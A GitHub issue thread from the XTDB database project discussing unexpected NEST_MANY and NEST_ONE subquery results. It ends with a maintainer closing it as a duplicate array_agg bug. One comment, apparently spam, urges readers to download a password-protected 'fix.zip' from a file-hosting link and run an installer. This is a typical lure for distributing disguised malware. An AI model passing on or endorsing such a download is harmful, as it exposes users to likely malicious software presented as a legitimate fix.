### ISSUE TITLE
Clarify/fix NEST_MANY semantics

### ISSUE THREAD

**Issue by refset** [xtdb/crux#3636]
E.g. users do not expect NULLs returned [here](https://play.xtdb.com/?version=2.0.0-SNAPSHOT&type=sql&txs=W3sic3lzdGVtLXRpbWUiOm51bGwsInR4cyI6IklOU0VSVCBJTlRPIHByb2R1Y3RzIChfaWQsIG5hbWUsIGRlc2NyaXB0aW9uLCBwcmljZSkgVkFMVUVTICgxLCAnRmluZSBsZWF0aGVyIGphY2tldCcsICdBIGZpbmUgbGVhdGhlciBqYWNrZXQgZm9yIGFsbCBwaXJhdGluZyBuZWVkcycsIDI5Ljk1KSxcbiAgKDIsJ0xvZyBmcm9tIEJsYW1tbycsICdJdCcncyBiaWcsIGl0JydzIGhlYXZ5LCBpdCcncyB3b29kJywgNC4yMCksXG4gICgzLCdJbGx1ZGl1bSBRLTM2IGV4cGxvc2l2ZSBzcGFjZSBtb2R1bGF0b3InLCAnSXMgdGhhdCBwZXNreSBwbGFuZXQgaW4gdGhlIHdheSBvZiB5b3VyIHZpZXcgb2YgVXJhbnVzPyBCbG93IGl0IHVwLicsIDQyMDY5KSxcbiAgKDQsJ0JhbGwnLCAnSXQnJ3MgYSBiYWxsLi4uIG5vdGhpbmcgbW9yZSB0byBpdCcsIDcuOTkpO1xuSU5TRVJUIElOVE8gY3VzdG9tZXIgKF9pZCwgbmFtZSwgYWRkcmVzcykgVkFMVUVTICgxLCAnTWF4IEZlZWRwcmVzc3VyZScsIHtcInN0cmVldFwiOiAnU29tZXN0cmVldCA2JywgXCJwb3N0YWxjb2RlXCI6ICc5MDIxMCcsXCJjb3VudHJ5XCI6ICdGSSd9KTtcbklOU0VSVCBJTlRPIG9yZGVycyAoX2lkLCBkYXRldGltZSwgY3VzdG9tZXJfaWQpIFZBTFVFUyAoMSwgVElNRVNUQU1QICcyMDI0LTA4LTE0VDE2OjQwOjU1LjY2NicsIDEpO1xuSU5TRVJUIElOVE8gb3JkZXJsaW5lIChfaWQsIG9yZGVyX2lkLCBwcm9kdWN0X2lkLCBxdWFudGl0eSkgVkFMVUVTICgxLCAxLCAxLCAxKSxcbiAgKDIsIDEsIDQsIDEwKTsifV0%3D&query=U0VMRUNUIGEuX2lkLCBhLm5hbWUsIGEub3JkZXJsaW5lcywgTkVTVF9NQU5ZKFNFTEVDVCAqLCAnb3JkZXJsaW5lJyBhcyAiQHR5cGUiIEZST00gb3JkZXJsaW5lIGIgIFdIRVJFIGIucHJvZHVjdF9pZCA9IGEuX2lkKSBBUyBvcmRlcmxpbmVzLCAncHJvZHVjdHMnIGFzICJAdHlwZSIgRlJPTSBwcm9kdWN0cyBh)

Similarly is it expected to have multiple `{}` entries returned [here](https://play.xtdb.com/?version=2.0.0-SNAPSHOT&type=sql&txs=W3sic3lzdGVtLXRpbWUiOm51bGwsInR4cyI6IklOU0VSVCBJTlRPIGRvY3MgKF9pZCwgZm9vKSBWQUxVRVMgKDEsICdiYXInKTtcbklOU0VSVCBJTlRPIGRvY3MgKF9pZCwgZm9vKSBWQUxVRVMgKDIsICdiYXonKTsifV0%3D&query=U0VMRUNUIF9pZCwgTkVTVF9NQU5ZIChTRUxFQ1QgcWF6IEZST00gZG9jcykgRlJPTSBkb2Nz)?

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tatut** [comment]
specifically, I would expect a `NEST_MANY` subquery that doesn't find any matching rows to return an empty array `[]`, not an array with a single null value `[null]` 

for NEST_ONE subquery that doesn't find the matching row, a `null` instead of the object would be expected

**Comment by jarohen** [comment]
> Similarly is it expected to have multiple {} entries returned [here](https://play.xtdb.com/?version=2.0.0-SNAPSHOT&type=sql&txs=W3sic3lzdGVtLXRpbWUiOm51bGwsInR4cyI6IklOU0VSVCBJTlRPIGRvY3MgKF9pZCwgZm9vKSBWQUxVRVMgKDEsICdiYXInKTtcbklOU0VSVCBJTlRPIGRvY3MgKF9pZCwgZm9vKSBWQUxVRVMgKDIsICdiYXonKTsifV0%3D&query=U0VMRUNUIF9pZCwgTkVTVF9NQU5ZIChTRUxFQ1QgcWF6IEZST00gZG9jcykgRlJPTSBkb2Nz)?

Yes, this is essentially a self cross-join - try `SELECT _id, NEST_MANY (SELECT qaz FROM docs d2 WHERE d1._id = d2._id) FROM docs d1`

Regarding semantics, yep, agreed - I think this is a bug with `array_agg`, for which (I _think_ ...) we already have a card.

**Comment by jarohen** [comment]
yep - #3049, so I'll close this one. Cheers @refset and @tatut 🙏
